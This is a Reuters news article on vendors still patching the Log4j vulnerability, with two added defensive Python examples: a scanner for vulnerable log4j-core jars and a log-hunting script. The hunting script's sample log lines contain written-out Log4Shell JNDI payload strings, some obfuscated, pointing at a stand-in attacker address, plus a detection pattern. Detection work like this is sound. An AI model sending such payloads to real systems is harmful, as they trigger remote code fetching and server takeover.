Several tech companies still working to fix flaw in logging software

SAN FRANCISCO (Reuters) -- Some of the world's largest technology companies are still trying to make their products safe from a gaping vulnerability in common logging software, a week after hackers began trying to exploit it.

According to a report released by the U.S. Cybersecurity and Infrastructure Security Agency (CISA), Cisco Systems, IBM, VMware and Splunk were among the companies with multiple pieces of flawed software that customers were using on Thursday without patches available for the Log4j vulnerability.

Logging software records activity such as site visits, clicks and chats so that it can be reviewed later.

The companies' efforts underscore the wide reach of the flaw, found inside open-source software and described by officials and researchers as the worst they have seen in years.

A researcher at Chinese tech company Alibaba warned the nonprofit Apache Software Foundation early this month that Log4j would not only keep track of chats or clicks but would also interpret certain strings in the text it was asked to log as instructions to fetch data from outside servers, which could allow a hacker to take control of the server.

Apache has rushed out a fix for the program. The free logger is used by thousands of other programs, and those responsible for them must prepare and distribute their own patches to prevent takeovers. The programs whose engineers are working around the clock include free software maintained by volunteers as well as products from companies big and small.

Security threat analyst Kevin Beaumont, who is helping compile the list for CISA, said that a lot of vendors are without security patches for this vulnerability. Software vendors need to have better, public inventories of their open-source software usage to be able to assess risk, both for themselves and their customers. A number of companies, including Cisco, are revising their guidance daily with new information on affected products, available patches and strategies for mitigating or detecting intrusions.
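One concrete form of the inventory Beaumont calls for, as an added example that is not part of the Reuters article, of CISA's list, or of any vendor's tooling: a script that walks a filesystem, opens every jar, war or ear it finds (including archives nested inside archives, which is where log4j-core usually hides), reads the log4j-core version from its Maven pom.properties, and checks whether the JndiLookup class is still present. The sample archives are constructed in a temporary directory for the example and are not real artifacts; the version threshold used (2.16.0, the release that removed message lookups and disabled JNDI by default) and the risk labels are this example's own simplification, not CISA's criteria.

```python
import io
import os
import re
import tempfile
import zipfile

# Marker entries inside a log4j-core jar. Deleting JndiLookup.class from the
# jar was the widely circulated stop-gap before patched releases existed.
JNDI_CLASS = "org/apache/logging/log4j/core/lookup/JndiLookup.class"
POM_PROPS = "META-INF/maven/org.apache.logging.log4j/log4j-core/pom.properties"
ARCHIVE_SUFFIXES = (".jar", ".war", ".ear", ".zip")


def parse_version(s):
    """'2.14.1' -> (2, 14, 1); a non-numeric suffix such as '-rc1' is ignored."""
    parts = []
    for piece in s.split("."):
        m = re.match(r"\d+", piece)
        if not m:
            break
        parts.append(int(m.group(0)))
    return tuple(parts)


def assess(version, jndi_present):
    """Risk label for one log4j-core hit. Assumption of this example: anything
    below 2.16.0 still expands message lookups and needs an upgrade."""
    if version is None:
        return ("unknown version; JndiLookup present, treat as vulnerable"
                if jndi_present else "unknown version; review manually")
    if parse_version(version) < (2, 16, 0):
        return "vulnerable: upgrade" + (", JndiLookup still present" if jndi_present else "")
    return "fixed for message lookups; check current advisories"


def inspect_archive(data, label):
    """Inspect one archive held in memory, recursing into bundled archives."""
    findings = []
    try:
        zf = zipfile.ZipFile(io.BytesIO(data))
    except zipfile.BadZipFile:
        return findings
    with zf:
        names = set(zf.namelist())
        version = None
        if POM_PROPS in names:
            props = zf.read(POM_PROPS).decode("utf-8", "replace")
            m = re.search(r"^version=(.+)$", props, re.M)
            if m:
                version = m.group(1).strip()
        jndi = JNDI_CLASS in names
        if version is not None or jndi:
            findings.append({"path": label, "version": version,
                             "jndi_lookup_present": jndi,
                             "assessment": assess(version, jndi)})
        # Fat jars, wars and ears carry log4j-core inside WEB-INF/lib etc.
        for n in sorted(names):
            if n.lower().endswith(ARCHIVE_SUFFIXES):
                findings.extend(inspect_archive(zf.read(n), label + "!" + n))
    return findings


def scan_tree(root):
    """Walk a directory tree and return every log4j-core finding."""
    findings = []
    for dirpath, _, files in os.walk(root):
        for f in sorted(files):
            if f.lower().endswith(ARCHIVE_SUFFIXES):
                path = os.path.join(dirpath, f)
                with open(path, "rb") as fh:
                    findings.extend(inspect_archive(fh.read(), path))
    return findings


def build_sample_tree():
    """Constructed fixture: a war bundling a fake log4j-core 2.14.1 jar that
    still ships JndiLookup.class, plus an unrelated jar. Not real artifacts."""
    root = tempfile.mkdtemp(prefix="log4j-scan-")
    core = io.BytesIO()
    with zipfile.ZipFile(core, "w") as zf:
        zf.writestr(POM_PROPS, "version=2.14.1\ngroupId=org.apache.logging.log4j\n"
                               "artifactId=log4j-core\n")
        zf.writestr(JNDI_CLASS, b"\xca\xfe\xba\xbe")  # stand-in for class bytes
    with zipfile.ZipFile(os.path.join(root, "app.war"), "w") as war:
        war.writestr("WEB-INF/lib/log4j-core-2.14.1.jar", core.getvalue())
    with zipfile.ZipFile(os.path.join(root, "other.jar"), "w") as other:
        other.writestr("com/example/Main.class", b"\xca\xfe\xba\xbe")
    return root


if __name__ == "__main__":
    for hit in scan_tree(build_sample_tree()):
        print(hit)
```

Run it against a real application directory by calling scan_tree on that path instead of the fixture. The nested-archive recursion is the part most ad-hoc scripts skipped in December 2021, and it is why shaded "fat" jars kept showing up as surprises; a scanner that only matches file names such as log4j-core-*.jar misses them entirely.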

As of Thursday, the CISA list included about 20 Cisco products that were vulnerable to attack without a patch available, including Cisco WebEx Meetings Server and Cisco Umbrella, a cloud security product.

Many more were listed as being investigated to see if they were vulnerable as well.

A company spokesman said that Cisco had reviewed over 200 products and that approximately 130 were not vulnerable. Many affected products have scheduled dates for software patches. VMware is updating the advisory on its site, which lists dozens of impacted products, many with critical vulnerabilities and patches pending. Some of those without a patch have workarounds to mitigate the holes.

Splunk has a similar list, along with tips for hunting for hackers who are trying to abuse the flaw.
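The mechanism in the Alibaba researcher's warning above, and the kind of hunting Splunk's tips describe, in one added example that is not part of the Reuters article or of Splunk's or any other vendor's guidance: Log4j 2 expanded `${...}` lookups in the text it logged, so a request header or URL containing `${jndi:ldap://attacker-host/x}` made the logging server connect out to that host. Attackers quickly hid the string behind nested lookups such as `${${lower:j}ndi:...}`. The Python below resolves nested lookups the way the library would, then reports any JNDI lookup that survives. The access-log lines are constructed for this example, 198.51.100.7 is a documentation address, and only the `lower`, `upper` and `:-` default forms are modelled (an assumption; the real library has more).

```python
import re

# Constructed sample web-server access log lines (not from the article or any
# real incident). Lines 0-2 carry Log4Shell probes in the User-Agent or URL,
# two of them hidden behind nested lookups; line 3 is benign.
SAMPLE_LOG_LINES = [
    '10.0.0.5 - - [10/Dec/2021:12:00:01 +0000] "GET / HTTP/1.1" 200 512 "-" '
    '"${jndi:ldap://198.51.100.7:1389/a}"',
    '10.0.0.6 - - [10/Dec/2021:12:00:02 +0000] "GET /login?u=${${lower:j}ndi:'
    '${lower:l}dap://198.51.100.7/b} HTTP/1.1" 200 331 "-" "curl/7.68.0"',
    '10.0.0.7 - - [10/Dec/2021:12:00:03 +0000] "GET / HTTP/1.1" 200 512 "-" '
    '"${${env:NOPE:-j}ndi:rmi://198.51.100.7:1099/c}"',
    '10.0.0.8 - - [10/Dec/2021:12:00:04 +0000] "GET /index.html HTTP/1.1" '
    '200 1024 "-" "Mozilla/5.0"',
]

# An innermost ${...}: a lookup whose body contains no further ${ or }.
_INNER = re.compile(r"\$\{([^${}]*)\}")
_JNDI = re.compile(r"\$\{jndi:[^}]*\}", re.IGNORECASE)


def resolve_lookup(body):
    """Evaluate one lookup body roughly as Log4j 2's string substitution does.
    Assumption: only the forms attackers use for obfuscation are modelled
    (lower, upper, and the ':-default' fallback of env/sys/any lookup);
    anything else resolves to the empty string."""
    key, _, rest = body.partition(":")
    if key == "lower":
        return rest.lower()
    if key == "upper":
        return rest.upper()
    if ":-" in body:
        return body.split(":-", 1)[1]
    return ""


def deobfuscate(text, max_rounds=32):
    """Resolve innermost lookups repeatedly, as the library does, but keep
    ${jndi:...} itself so it can be reported. Bounded so self-referential
    input cannot loop forever."""
    for _ in range(max_rounds):
        changed = False

        def replace(m):
            nonlocal changed
            body = m.group(1)
            if body.lower().startswith("jndi:"):
                return m.group(0)
            changed = True
            return resolve_lookup(body)

        text = _INNER.sub(replace, text)
        if not changed:
            break
    return text


def find_jndi_probes(line):
    """Return (scheme, lookup) pairs for every JNDI lookup left in the line
    after de-obfuscation, e.g. [('ldap', '${jndi:ldap://host:1389/a}')]."""
    hits = []
    for m in _JNDI.finditer(deobfuscate(line)):
        lookup = m.group(0)
        scheme = lookup[len("${jndi:"):].split(":", 1)[0].lower()
        hits.append((scheme, lookup))
    return hits


def hunt(lines):
    """Scan many lines; yields (line_index, scheme, lookup) per probe found."""
    return [(i, s, l) for i, line in enumerate(lines)
            for s, l in find_jndi_probes(line)]


if __name__ == "__main__":
    for idx, scheme, lookup in hunt(SAMPLE_LOG_LINES):
        print(f"line {idx}: {scheme} probe {lookup}")
```

Two caveats for anyone turning this into a production hunt: the obfuscation space is larger than the three forms modelled here, so a first-pass alert on any `${` in an HTTP header, URL or form field is cheaper and catches more; and the log line that records the probe is not proof of compromise, which requires checking whether the host actually made the outbound LDAP or RMI connection the lookup asked for.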

IBM said it does not confirm or disclose vulnerabilities externally, even to individual customers, until a fix or remediation is available, and it listed nonvulnerable products. CISA officials said Wednesday they had not confirmed any successful government-backed attacks or intrusions inside U.S. government equipment, even though Microsoft, Mandiant and CrowdStrike have all said they see state-backed attackers from the United States' better-equipped adversaries probing for the Log4j flaw.